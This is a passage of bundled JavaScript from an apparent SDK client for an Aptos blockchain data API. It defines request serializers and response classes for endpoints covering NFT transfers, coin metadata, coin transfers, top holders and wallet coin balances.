        return $a7ef34a427d74c9c$export$18ddac2fb7a6631b.fromJSON(json);
    },
    serializeRequest: function(request) {
        var collectionDataIdHash = request.collectionDataIdHash;
        var limit = request.limit;
        var offset = request.offset;
        var cursor = request.cursor;
        var walletWhitelist = request.walletWhitelist;
        var walletBlacklist = request.walletBlacklist;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            collection_data_id_hash: collectionDataIdHash,
            limit: limit,
            offset: offset,
            cursor: cursor,
            wallet_whitelist: walletWhitelist,
            wallet_blacklist: walletBlacklist,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$87ab67386ef5438c = /** @class */ function() {
    function AptosGetNFTTransfersByCreatorsResponse(input) {
        this.cursor = input.cursor;
        this.hasNextPage = input.hasNextPage;
        this.result = input.result.map(function(item) {
            return $a7ef34a427d74c9c$export$4e5fbbe518bf3d89.create(item);
        });
    }
    AptosGetNFTTransfersByCreatorsResponse.create = function(input) {
        if (input instanceof AptosGetNFTTransfersByCreatorsResponse) return input;
        return new AptosGetNFTTransfersByCreatorsResponse(input);
    };
    AptosGetNFTTransfersByCreatorsResponse.fromJSON = function(json) {
        var input = {
            cursor: json.cursor,
            hasNextPage: json.hasNextPage,
            result: json.result.map(function(item) {
                return $a7ef34a427d74c9c$export$4e5fbbe518bf3d89.fromJSON(item);
            })
        };
        return AptosGetNFTTransfersByCreatorsResponse.create(input);
    };
    AptosGetNFTTransfersByCreatorsResponse.prototype.toJSON = function() {
        return {
            cursor: this.cursor,
            hasNextPage: this.hasNextPage,
            result: this.result.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosGetNFTTransfersByCreatorsResponse;
}();
var $a7ef34a427d74c9c$export$1d2aea779a3c39c5 = {
    operationId: "getNFTTransfersByCreators",
    groupName: "nfts",
    httpMethod: "get",
    routePattern: "/nfts/transfers/creators",
    parameterNames: [
        "limit",
        "offset",
        "cursor",
        "creator_addresses",
        "collection_blacklist",
        "collection_whitelist",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$87ab67386ef5438c.fromJSON(json);
    },
    serializeRequest: function(request) {
        var limit = request.limit;
        var offset = request.offset;
        var cursor = request.cursor;
        var creatorAddresses = request.creatorAddresses.map(function(item) {
            return $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(item);
        });
        var collectionBlacklist = request.collectionBlacklist;
        var collectionWhitelist = request.collectionWhitelist;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            limit: limit,
            offset: offset,
            cursor: cursor,
            creator_addresses: creatorAddresses.map(function(item) {
                return item.toJSON();
            }),
            collection_blacklist: collectionBlacklist,
            collection_whitelist: collectionWhitelist,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$42654a34bb677c53 = /** @class */ function() {
    function AptosNFTTransfersByWalletsResponse(input) {
        this.cursor = input.cursor;
        this.hasNextPage = input.hasNextPage;
        this.result = input.result.map(function(item) {
            return $a7ef34a427d74c9c$export$4e5fbbe518bf3d89.create(item);
        });
    }
    AptosNFTTransfersByWalletsResponse.create = function(input) {
        if (input instanceof AptosNFTTransfersByWalletsResponse) return input;
        return new AptosNFTTransfersByWalletsResponse(input);
    };
    AptosNFTTransfersByWalletsResponse.fromJSON = function(json) {
        var input = {
            cursor: json.cursor,
            hasNextPage: json.hasNextPage,
            result: json.result.map(function(item) {
                return $a7ef34a427d74c9c$export$4e5fbbe518bf3d89.fromJSON(item);
            })
        };
        return AptosNFTTransfersByWalletsResponse.create(input);
    };
    AptosNFTTransfersByWalletsResponse.prototype.toJSON = function() {
        return {
            cursor: this.cursor,
            hasNextPage: this.hasNextPage,
            result: this.result.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosNFTTransfersByWalletsResponse;
}();
var $a7ef34a427d74c9c$export$b76b3fbad5070842 = {
    operationId: "getNFTTransfersByWallets",
    groupName: "nfts",
    httpMethod: "get",
    routePattern: "/nfts/transfers/wallets",
    parameterNames: [
        "limit",
        "offset",
        "cursor",
        "wallet_addresses",
        "collection_blacklist",
        "collection_whitelist",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$42654a34bb677c53.fromJSON(json);
    },
    serializeRequest: function(request) {
        var limit = request.limit;
        var offset = request.offset;
        var cursor = request.cursor;
        var walletAddresses = request.walletAddresses.map(function(item) {
            return $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(item);
        });
        var collectionBlacklist = request.collectionBlacklist;
        var collectionWhitelist = request.collectionWhitelist;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            limit: limit,
            offset: offset,
            cursor: cursor,
            wallet_addresses: walletAddresses.map(function(item) {
                return item.toJSON();
            }),
            collection_blacklist: collectionBlacklist,
            collection_whitelist: collectionWhitelist,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$e85082925bbcaa75 = /** @class */ function() {
    function AptosCoinInfoDto(input) {
        this.coinType = input.coinType;
        this.coinTypeHash = input.coinTypeHash;
        this.creatorAddress = $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(input.creatorAddress);
        this.decimals = input.decimals;
        this.name = input.name;
        this.supplyAggregatorTableHandle = input.supplyAggregatorTableHandle;
        this.supplyAggregatorTableKey = input.supplyAggregatorTableKey;
        this.symbol = input.symbol;
        this.transactionCreatedTimestamp = input.transactionCreatedTimestamp;
        this.transactionVersionCreated = input.transactionVersionCreated;
    }
    AptosCoinInfoDto.create = function(input) {
        if (input instanceof AptosCoinInfoDto) return input;
        return new AptosCoinInfoDto(input);
    };
    AptosCoinInfoDto.fromJSON = function(json) {
        var input = {
            coinType: json.coin_type,
            coinTypeHash: json.coin_type_hash,
            creatorAddress: $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.fromJSON(json.creator_address),
            decimals: json.decimals,
            name: json.name,
            supplyAggregatorTableHandle: json.supply_aggregator_table_handle,
            supplyAggregatorTableKey: json.supply_aggregator_table_key,
            symbol: json.symbol,
            transactionCreatedTimestamp: json.transaction_created_timestamp,
            transactionVersionCreated: json.transaction_version_created
        };
        return AptosCoinInfoDto.create(input);
    };
    AptosCoinInfoDto.prototype.toJSON = function() {
        return {
            coin_type: this.coinType,
            coin_type_hash: this.coinTypeHash,
            creator_address: this.creatorAddress.toJSON(),
            decimals: this.decimals,
            name: this.name,
            supply_aggregator_table_handle: this.supplyAggregatorTableHandle,
            supply_aggregator_table_key: this.supplyAggregatorTableKey,
            symbol: this.symbol,
            transaction_created_timestamp: this.transactionCreatedTimestamp,
            transaction_version_created: this.transactionVersionCreated
        };
    };
    return AptosCoinInfoDto;
}();
var $a7ef34a427d74c9c$export$e1f2715da49946f0 = {
    operationId: "getCoinInfoByCoinTypeHashes",
    groupName: "coins",
    httpMethod: "get",
    routePattern: "/coins",
    parameterNames: [
        "coin_type_hashes",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return json.map(function(item) {
            return $a7ef34a427d74c9c$export$e85082925bbcaa75.fromJSON(item);
        });
    },
    serializeRequest: function(request) {
        var coinTypeHashes = request.coinTypeHashes;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            coin_type_hashes: coinTypeHashes,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$c3936acb434948ec = /** @class */ function() {
    function AptosGetLatestCoinsResponse(input) {
        this.cursor = input.cursor;
        this.hasNextPage = input.hasNextPage;
        this.result = input.result.map(function(item) {
            return $a7ef34a427d74c9c$export$e85082925bbcaa75.create(item);
        });
    }
    AptosGetLatestCoinsResponse.create = function(input) {
        if (input instanceof AptosGetLatestCoinsResponse) return input;
        return new AptosGetLatestCoinsResponse(input);
    };
    AptosGetLatestCoinsResponse.fromJSON = function(json) {
        var input = {
            cursor: json.cursor,
            hasNextPage: json.hasNextPage,
            result: json.result.map(function(item) {
                return $a7ef34a427d74c9c$export$e85082925bbcaa75.fromJSON(item);
            })
        };
        return AptosGetLatestCoinsResponse.create(input);
    };
    AptosGetLatestCoinsResponse.prototype.toJSON = function() {
        return {
            cursor: this.cursor,
            hasNextPage: this.hasNextPage,
            result: this.result.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosGetLatestCoinsResponse;
}();
var $a7ef34a427d74c9c$export$2c6abf653e9049d6 = {
    operationId: "getLatestCoins",
    groupName: "coins",
    httpMethod: "get",
    routePattern: "/coins/latest",
    parameterNames: [
        "limit",
        "offset",
        "cursor",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$c3936acb434948ec.fromJSON(json);
    },
    serializeRequest: function(request) {
        var limit = request.limit;
        var offset = request.offset;
        var cursor = request.cursor;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            limit: limit,
            offset: offset,
            cursor: cursor,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$3073d052e06644aa = /** @class */ function() {
    function AptosGetCoinsByNameRangeResponse(input) {
        this.cursor = input.cursor;
        this.hasNextPage = input.hasNextPage;
        this.result = input.result.map(function(item) {
            return $a7ef34a427d74c9c$export$e85082925bbcaa75.create(item);
        });
    }
    AptosGetCoinsByNameRangeResponse.create = function(input) {
        if (input instanceof AptosGetCoinsByNameRangeResponse) return input;
        return new AptosGetCoinsByNameRangeResponse(input);
    };
    AptosGetCoinsByNameRangeResponse.fromJSON = function(json) {
        var input = {
            cursor: json.cursor,
            hasNextPage: json.hasNextPage,
            result: json.result.map(function(item) {
                return $a7ef34a427d74c9c$export$e85082925bbcaa75.fromJSON(item);
            })
        };
        return AptosGetCoinsByNameRangeResponse.create(input);
    };
    AptosGetCoinsByNameRangeResponse.prototype.toJSON = function() {
        return {
            cursor: this.cursor,
            hasNextPage: this.hasNextPage,
            result: this.result.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosGetCoinsByNameRangeResponse;
}();
var $a7ef34a427d74c9c$export$a9e1213231c21cda = {
    operationId: "getCoinsByNameRange",
    groupName: "coins",
    httpMethod: "get",
    routePattern: "/coins/names",
    parameterNames: [
        "limit",
        "offset",
        "cursor",
        "from_name",
        "to_name",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$3073d052e06644aa.fromJSON(json);
    },
    serializeRequest: function(request) {
        var limit = request.limit;
        var offset = request.offset;
        var cursor = request.cursor;
        var fromName = request.fromName;
        var toName = request.toName;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            limit: limit,
            offset: offset,
            cursor: cursor,
            from_name: fromName,
            to_name: toName,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$23f9fc46a5e2a485 = /** @class */ function() {
    function AptosGetCoinsBySymbolRangeResponse(input) {
        this.cursor = input.cursor;
        this.hasNextPage = input.hasNextPage;
        this.result = input.result.map(function(item) {
            return $a7ef34a427d74c9c$export$e85082925bbcaa75.create(item);
        });
    }
    AptosGetCoinsBySymbolRangeResponse.create = function(input) {
        if (input instanceof AptosGetCoinsBySymbolRangeResponse) return input;
        return new AptosGetCoinsBySymbolRangeResponse(input);
    };
    AptosGetCoinsBySymbolRangeResponse.fromJSON = function(json) {
        var input = {
            cursor: json.cursor,
            hasNextPage: json.hasNextPage,
            result: json.result.map(function(item) {
                return $a7ef34a427d74c9c$export$e85082925bbcaa75.fromJSON(item);
            })
        };
        return AptosGetCoinsBySymbolRangeResponse.create(input);
    };
    AptosGetCoinsBySymbolRangeResponse.prototype.toJSON = function() {
        return {
            cursor: this.cursor,
            hasNextPage: this.hasNextPage,
            result: this.result.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosGetCoinsBySymbolRangeResponse;
}();
var $a7ef34a427d74c9c$export$ed43b8b43ddbe7cf = {
    operationId: "getCoinsBySymbolRange",
    groupName: "coins",
    httpMethod: "get",
    routePattern: "/coins/symbols",
    parameterNames: [
        "limit",
        "offset",
        "cursor",
        "from_symbol",
        "to_symbol",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$23f9fc46a5e2a485.fromJSON(json);
    },
    serializeRequest: function(request) {
        var limit = request.limit;
        var offset = request.offset;
        var cursor = request.cursor;
        var fromSymbol = request.fromSymbol;
        var toSymbol = request.toSymbol;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            limit: limit,
            offset: offset,
            cursor: cursor,
            from_symbol: fromSymbol,
            to_symbol: toSymbol,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$d15132c009cf857b = /** @class */ function() {
    function AptosGetCoinsByCreatorsResponse(input) {
        this.cursor = input.cursor;
        this.hasNextPage = input.hasNextPage;
        this.result = input.result.map(function(item) {
            return $a7ef34a427d74c9c$export$e85082925bbcaa75.create(item);
        });
    }
    AptosGetCoinsByCreatorsResponse.create = function(input) {
        if (input instanceof AptosGetCoinsByCreatorsResponse) return input;
        return new AptosGetCoinsByCreatorsResponse(input);
    };
    AptosGetCoinsByCreatorsResponse.fromJSON = function(json) {
        var input = {
            cursor: json.cursor,
            hasNextPage: json.hasNextPage,
            result: json.result.map(function(item) {
                return $a7ef34a427d74c9c$export$e85082925bbcaa75.fromJSON(item);
            })
        };
        return AptosGetCoinsByCreatorsResponse.create(input);
    };
    AptosGetCoinsByCreatorsResponse.prototype.toJSON = function() {
        return {
            cursor: this.cursor,
            hasNextPage: this.hasNextPage,
            result: this.result.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosGetCoinsByCreatorsResponse;
}();
var $a7ef34a427d74c9c$export$c2b74bb10dd7c6f4 = {
    operationId: "getCoinsByCreators",
    groupName: "coins",
    httpMethod: "get",
    routePattern: "/coins/creators",
    parameterNames: [
        "limit",
        "offset",
        "cursor",
        "creator_addresses",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$d15132c009cf857b.fromJSON(json);
    },
    serializeRequest: function(request) {
        var limit = request.limit;
        var offset = request.offset;
        var cursor = request.cursor;
        var creatorAddresses = request.creatorAddresses.map(function(item) {
            return $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(item);
        });
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            limit: limit,
            offset: offset,
            cursor: cursor,
            creator_addresses: creatorAddresses.map(function(item) {
                return item.toJSON();
            }),
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$9bf0ed2bdfd0a0e3 = /** @class */ function() {
    function AptosCoinTransferDto(input) {
        this.activityType = input.activityType;
        this.amount = $a7ef34a427d74c9c$export$5d1e9aab577c748d.create(input.amount);
        this.blockHeight = input.blockHeight;
        this.coinType = input.coinType;
        this.entryFunctionIdStr = input.entryFunctionIdStr;
        this.eventAccountAddress = input.eventAccountAddress;
        this.eventCreationNumber = input.eventCreationNumber;
        this.eventSequenceNumber = input.eventSequenceNumber;
        this.isGasFee = input.isGasFee;
        this.isTransactionSuccess = input.isTransactionSuccess;
        this.ownerAddress = $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(input.ownerAddress);
        this.transactionTimestamp = input.transactionTimestamp;
        this.transactionVersion = input.transactionVersion;
    }
    AptosCoinTransferDto.create = function(input) {
        if (input instanceof AptosCoinTransferDto) return input;
        return new AptosCoinTransferDto(input);
    };
    AptosCoinTransferDto.fromJSON = function(json) {
        var input = {
            activityType: json.activity_type,
            amount: $a7ef34a427d74c9c$export$5d1e9aab577c748d.fromJSON(json.amount),
            blockHeight: json.block_height,
            coinType: json.coin_type,
            entryFunctionIdStr: json.entry_function_id_str,
            eventAccountAddress: json.event_account_address,
            eventCreationNumber: json.event_creation_number,
            eventSequenceNumber: json.event_sequence_number,
            isGasFee: json.is_gas_fee,
            isTransactionSuccess: json.is_transaction_success,
            ownerAddress: $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.fromJSON(json.owner_address),
            transactionTimestamp: json.transaction_timestamp,
            transactionVersion: json.transaction_version
        };
        return AptosCoinTransferDto.create(input);
    };
    AptosCoinTransferDto.prototype.toJSON = function() {
        return {
            activity_type: this.activityType,
            amount: this.amount.toJSON(),
            block_height: this.blockHeight,
            coin_type: this.coinType,
            entry_function_id_str: this.entryFunctionIdStr,
            event_account_address: this.eventAccountAddress,
            event_creation_number: this.eventCreationNumber,
            event_sequence_number: this.eventSequenceNumber,
            is_gas_fee: this.isGasFee,
            is_transaction_success: this.isTransactionSuccess,
            owner_address: this.ownerAddress.toJSON(),
            transaction_timestamp: this.transactionTimestamp,
            transaction_version: this.transactionVersion
        };
    };
    return AptosCoinTransferDto;
}();
var $a7ef34a427d74c9c$export$cc05bc4da8f83941 = /** @class */ function() {
    function AptosGetCoinTransfersByOwnerAddressesResponse(input) {
        this.cursor = input.cursor;
        this.hasNextPage = input.hasNextPage;
        this.result = input.result.map(function(item) {
            return $a7ef34a427d74c9c$export$9bf0ed2bdfd0a0e3.create(item);
        });
    }
    AptosGetCoinTransfersByOwnerAddressesResponse.create = function(input) {
        if (input instanceof AptosGetCoinTransfersByOwnerAddressesResponse) return input;
        return new AptosGetCoinTransfersByOwnerAddressesResponse(input);
    };
    AptosGetCoinTransfersByOwnerAddressesResponse.fromJSON = function(json) {
        var input = {
            cursor: json.cursor,
            hasNextPage: json.hasNextPage,
            result: json.result.map(function(item) {
                return $a7ef34a427d74c9c$export$9bf0ed2bdfd0a0e3.fromJSON(item);
            })
        };
        return AptosGetCoinTransfersByOwnerAddressesResponse.create(input);
    };
    AptosGetCoinTransfersByOwnerAddressesResponse.prototype.toJSON = function() {
        return {
            cursor: this.cursor,
            hasNextPage: this.hasNextPage,
            result: this.result.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosGetCoinTransfersByOwnerAddressesResponse;
}();
var $a7ef34a427d74c9c$export$443828fb54ec6c26 = {
    operationId: "getCoinTransfersByOwnerAddresses",
    groupName: "coins",
    httpMethod: "get",
    routePattern: "/coins/transfers/wallets",
    parameterNames: [
        "limit",
        "offset",
        "cursor",
        "owner_addresses",
        "from_date",
        "to_date",
        "coin_type_blacklist",
        "coin_type_whitelist",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$cc05bc4da8f83941.fromJSON(json);
    },
    serializeRequest: function(request) {
        var limit = request.limit;
        var offset = request.offset;
        var cursor = request.cursor;
        var ownerAddresses = request.ownerAddresses.map(function(item) {
            return $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(item);
        });
        var fromDate = request.fromDate;
        var toDate = request.toDate;
        var coinTypeBlacklist = request.coinTypeBlacklist;
        var coinTypeWhitelist = request.coinTypeWhitelist;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            limit: limit,
            offset: offset,
            cursor: cursor,
            owner_addresses: ownerAddresses.map(function(item) {
                return item.toJSON();
            }),
            from_date: fromDate,
            to_date: toDate,
            coin_type_blacklist: coinTypeBlacklist,
            coin_type_whitelist: coinTypeWhitelist,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$9ac17b382ba710fe = /** @class */ function() {
    function AptosGetCoinTransfersByBlockHeightsResponse(input) {
        this.cursor = input.cursor;
        this.hasNextPage = input.hasNextPage;
        this.result = input.result.map(function(item) {
            return $a7ef34a427d74c9c$export$9bf0ed2bdfd0a0e3.create(item);
        });
    }
    AptosGetCoinTransfersByBlockHeightsResponse.create = function(input) {
        if (input instanceof AptosGetCoinTransfersByBlockHeightsResponse) return input;
        return new AptosGetCoinTransfersByBlockHeightsResponse(input);
    };
    AptosGetCoinTransfersByBlockHeightsResponse.fromJSON = function(json) {
        var input = {
            cursor: json.cursor,
            hasNextPage: json.hasNextPage,
            result: json.result.map(function(item) {
                return $a7ef34a427d74c9c$export$9bf0ed2bdfd0a0e3.fromJSON(item);
            })
        };
        return AptosGetCoinTransfersByBlockHeightsResponse.create(input);
    };
    AptosGetCoinTransfersByBlockHeightsResponse.prototype.toJSON = function() {
        return {
            cursor: this.cursor,
            hasNextPage: this.hasNextPage,
            result: this.result.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosGetCoinTransfersByBlockHeightsResponse;
}();
var $a7ef34a427d74c9c$export$56510a7d4739a5ff = {
    operationId: "getCoinTransfersByBlockHeights",
    groupName: "coins",
    httpMethod: "get",
    routePattern: "/coins/transfers/blocks",
    parameterNames: [
        "limit",
        "offset",
        "cursor",
        "block_heights",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$9ac17b382ba710fe.fromJSON(json);
    },
    serializeRequest: function(request) {
        var limit = request.limit;
        var offset = request.offset;
        var cursor = request.cursor;
        var blockHeights = request.blockHeights;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            limit: limit,
            offset: offset,
            cursor: cursor,
            block_heights: blockHeights,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$d4630fc2adfbe26e = /** @class */ function() {
    function AptosGetCoinTransfersByCoinTypeResponse(input) {
        this.cursor = input.cursor;
        this.hasNextPage = input.hasNextPage;
        this.result = input.result.map(function(item) {
            return $a7ef34a427d74c9c$export$9bf0ed2bdfd0a0e3.create(item);
        });
    }
    AptosGetCoinTransfersByCoinTypeResponse.create = function(input) {
        if (input instanceof AptosGetCoinTransfersByCoinTypeResponse) return input;
        return new AptosGetCoinTransfersByCoinTypeResponse(input);
    };
    AptosGetCoinTransfersByCoinTypeResponse.fromJSON = function(json) {
        var input = {
            cursor: json.cursor,
            hasNextPage: json.hasNextPage,
            result: json.result.map(function(item) {
                return $a7ef34a427d74c9c$export$9bf0ed2bdfd0a0e3.fromJSON(item);
            })
        };
        return AptosGetCoinTransfersByCoinTypeResponse.create(input);
    };
    AptosGetCoinTransfersByCoinTypeResponse.prototype.toJSON = function() {
        return {
            cursor: this.cursor,
            hasNextPage: this.hasNextPage,
            result: this.result.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosGetCoinTransfersByCoinTypeResponse;
}();
var $a7ef34a427d74c9c$export$36701cf3f4ccabb9 = {
    operationId: "getCoinTransfersByCoinType",
    groupName: "coins",
    httpMethod: "get",
    routePattern: "/coins/transfers/{coin_type}",
    parameterNames: [
        "coin_type",
        "limit",
        "offset",
        "cursor",
        "from_date",
        "to_date",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$d4630fc2adfbe26e.fromJSON(json);
    },
    serializeRequest: function(request) {
        var coinType = request.coinType;
        var limit = request.limit;
        var offset = request.offset;
        var cursor = request.cursor;
        var fromDate = request.fromDate;
        var toDate = request.toDate;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            coin_type: coinType,
            limit: limit,
            offset: offset,
            cursor: cursor,
            from_date: fromDate,
            to_date: toDate,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$9f9c2d80ea8ea1c3 = /** @class */ function() {
    function AptosCurrentCoinBalanceDto(input) {
        this.amount = $a7ef34a427d74c9c$export$5d1e9aab577c748d.create(input.amount);
        this.coinType = input.coinType;
        this.coinTypeHash = input.coinTypeHash;
        this.lastTransactionTimestamp = input.lastTransactionTimestamp;
        this.lastTransactionVersion = input.lastTransactionVersion;
        this.ownerAddress = $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(input.ownerAddress);
    }
    AptosCurrentCoinBalanceDto.create = function(input) {
        if (input instanceof AptosCurrentCoinBalanceDto) return input;
        return new AptosCurrentCoinBalanceDto(input);
    };
    AptosCurrentCoinBalanceDto.fromJSON = function(json) {
        var input = {
            amount: $a7ef34a427d74c9c$export$5d1e9aab577c748d.fromJSON(json.amount),
            coinType: json.coin_type,
            coinTypeHash: json.coin_type_hash,
            lastTransactionTimestamp: json.last_transaction_timestamp,
            lastTransactionVersion: json.last_transaction_version,
            ownerAddress: $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.fromJSON(json.owner_address)
        };
        return AptosCurrentCoinBalanceDto.create(input);
    };
    AptosCurrentCoinBalanceDto.prototype.toJSON = function() {
        return {
            amount: this.amount.toJSON(),
            coin_type: this.coinType,
            coin_type_hash: this.coinTypeHash,
            last_transaction_timestamp: this.lastTransactionTimestamp,
            last_transaction_version: this.lastTransactionVersion,
            owner_address: this.ownerAddress.toJSON()
        };
    };
    return AptosCurrentCoinBalanceDto;
}();
var $a7ef34a427d74c9c$export$e323bc5d0af261d6 = /** @class */ function() {
    function AptosGetTopHoldersByCoinResponse(input) {
        this.cursor = input.cursor;
        this.hasNextPage = input.hasNextPage;
        this.result = input.result.map(function(item) {
            return $a7ef34a427d74c9c$export$9f9c2d80ea8ea1c3.create(item);
        });
    }
    AptosGetTopHoldersByCoinResponse.create = function(input) {
        if (input instanceof AptosGetTopHoldersByCoinResponse) return input;
        return new AptosGetTopHoldersByCoinResponse(input);
    };
    AptosGetTopHoldersByCoinResponse.fromJSON = function(json) {
        var input = {
            cursor: json.cursor,
            hasNextPage: json.hasNextPage,
            result: json.result.map(function(item) {
                return $a7ef34a427d74c9c$export$9f9c2d80ea8ea1c3.fromJSON(item);
            })
        };
        return AptosGetTopHoldersByCoinResponse.create(input);
    };
    AptosGetTopHoldersByCoinResponse.prototype.toJSON = function() {
        return {
            cursor: this.cursor,
            hasNextPage: this.hasNextPage,
            result: this.result.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosGetTopHoldersByCoinResponse;
}();
var $a7ef34a427d74c9c$export$d1e56e567de73190 = {
    operationId: "getTopHoldersByCoin",
    groupName: "coins",
    httpMethod: "get",
    routePattern: "/coins/owners/{coin_type_hash}/top-holders",
    parameterNames: [
        "coin_type_hash",
        "limit",
        "offset",
        "cursor",
        "min_amount",
        "min_version",
        "wallet_blacklist",
        "wallet_whitelist",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$e323bc5d0af261d6.fromJSON(json);
    },
    serializeRequest: function(request) {
        var coinTypeHash = request.coinTypeHash;
        var limit = request.limit;
        var offset = request.offset;
        var cursor = request.cursor;
        var minAmount = request.minAmount ? $a7ef34a427d74c9c$export$5d1e9aab577c748d.create(request.minAmount) : undefined;
        var minVersion = request.minVersion;
        var walletBlacklist = request.walletBlacklist;
        var walletWhitelist = request.walletWhitelist;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            coin_type_hash: coinTypeHash,
            limit: limit,
            offset: offset,
            cursor: cursor,
            min_amount: minAmount ? minAmount.toJSON() : undefined,
            min_version: minVersion,
            wallet_blacklist: walletBlacklist,
            wallet_whitelist: walletWhitelist,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$b42d2a9d29accb01 = /** @class */ function() {
    function AptosGetCoinBalancesByWalletsResponse(input) {
        this.cursor = input.cursor;
        this.hasNextPage = input.hasNextPage;
        this.result = input.result.map(function(item) {
            return $a7ef34a427d74c9c$export$9f9c2d80ea8ea1c3.create(item);
        });
    }
    AptosGetCoinBalancesByWalletsResponse.create = function(input) {
        if (input instanceof AptosGetCoinBalancesByWalletsResponse) return input;
        return new AptosGetCoinBalancesByWalletsResponse(input);
    };
    AptosGetCoinBalancesByWalletsResponse.fromJSON = function(json) {
        var input = {
            cursor: json.cursor,
            hasNextPage: json.hasNextPage,
            result: json.result.map(function(item) {
                return $a7ef34a427d74c9c$export$9f9c2d80ea8ea1c3.fromJSON(item);
            })
        };
        return AptosGetCoinBalancesByWalletsResponse.create(input);
    };
    AptosGetCoinBalancesByWalletsResponse.prototype.toJSON = function() {
        return {
            cursor: this.cursor,
            hasNextPage: this.hasNextPage,
            result: this.result.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosGetCoinBalancesByWalletsResponse;
}();
var $a7ef34a427d74c9c$export$7be1004cc0937d8b = {
    operationId: "getCoinBalancesByWallets",
    groupName: "wallets",
    httpMethod: "get",
    routePattern: "/wallets/coins",
    parameterNames: [
        "limit",
        "offset",
        "cursor",
        "owner_addresses",
        "coin_type_hash_blacklist",
        "coin_type_hash_whitelist",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$b42d2a9d29accb01.fromJSON(json);
    },
    serializeRequest: function(request) {
        var limit = request.limit;
        var offset = request.offset;
        var cursor = request.cursor;
        var ownerAddresses = request.ownerAddresses.map(function(item) {
            return $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(item);
        });
        var coinTypeHashBlacklist = request.coinTypeHashBlacklist;
        var coinTypeHashWhitelist = request.coinTypeHashWhitelist;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            limit: limit,
            offset: offset,
            cursor: cursor,
            owner_addresses: ownerAddresses.map(function(item) {
                return item.toJSON();
            }),
            coin_type_hash_blacklist: coinTypeHashBlacklist,
            coin_type_hash_whitelist: coinTypeHashWhitelist,
